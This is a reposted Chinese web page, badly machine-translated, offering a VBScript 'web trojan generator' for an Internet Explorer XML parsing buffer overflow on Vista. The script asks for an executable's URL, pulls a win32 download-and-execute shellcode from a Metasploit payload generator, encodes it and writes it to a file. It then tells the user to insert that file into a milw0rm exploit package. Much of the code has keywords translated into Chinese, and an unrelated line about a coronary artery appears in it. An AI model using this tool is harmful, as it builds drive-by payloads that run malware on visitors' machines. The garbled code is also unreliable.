,,网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
MS Internet Explorer XML解析缓冲区溢出漏洞(vista)0天利用代码
冠状动脉左旋支(left circumflex coronary artery)代码
出错时恢复Next Exeurl=InputBox('请输入可执行程序的扩展名的地址:', '输入,http://www。海洋顶。net/333。' URL=' http://www .metasploit。com:55555/PAYLOADS?parent=GLOB(0x 25 BFA 38)MODULE=win32 _ downloadexecMODE=Generate opt _ URL=' URL encoding(Exeurl)' MaxSize=bad chars=0x 00 ENCODER=默认操作=生成有效负载'
body=get http page(URL)Set Re=New RegExp Re .pattern='(\ $ shellcode \=[\ S \ S]/div/pre)'
设置匹配=回复.如果匹配则执行(身体).Count0 Then Body=Matches(0).价值
code=Trim(Replace(Replace(Replace(Replace(Replace(Replace(Body,' $shellcode=',''),Chr(34),''),Chr(13),''),';',''),'/div/pre ',''),Chr(10),''),'.',''))
函数replace regex(str)set regex=new regExp regex。pattern=' \ \ x(.)\\x(.)'正则表达式.忽略大小写=真正则表达式。global=真匹配=正则表达式。replace(str,' % u $ 2 $ 1 ')replace regex=匹配结束函数
Function getHTTPPage(Path)t=GetBody(Path)getHTTPPage=BytesToBstr(t,' GB2312') End Function
函数出错时GetBody(URL)Resume Next Set Retrieval=CreateObject(' Microsoft .XMLHTTP’)与检索。打开Get ',url,False ' ',' ' .发送GetBody=.响应正文以集合检索结束=无结束函数
Function BytesToBstr(Body,Cset)Dim objstream Set objstream=CreateObject(' adodb。stream)目标流.类型=1对象流。模式=3对象流。打开对象流。编写正文对象流位置=0对象流Type=2 objstream .charset=Cset BytesToBstr=objstream .ReadText对象流.关闭Set objstream=Nothing End函数
函数URL编码(vs Trin)strReturn=' ' For aaaa=1 To Len(vs Trin)this chr=Mid(vs Trin,AAAA,1)If Abs(Asc(this chr))HFF Then strReturn=strReturn this chr Else内码=Asc(this chr)If内码0 Then内码=内码h 10000 End If hight 8=(内码和HFF00)\ HFF低8=内部代码和HFF strReturn=strReturn ' % % '十六进制(高8)' '
set FSO=CreateObject('脚本。文件系统对象’)设置文件=FSO。打开文本文件(' a . txt ',2,true)文件。writeline替换regex(code)文件。writeline体wscript。echo替换regex(代码)文件。近距离FSO=无
' wscript.echo Chr(13)'好的,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的外壳代码一内容即可'
郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。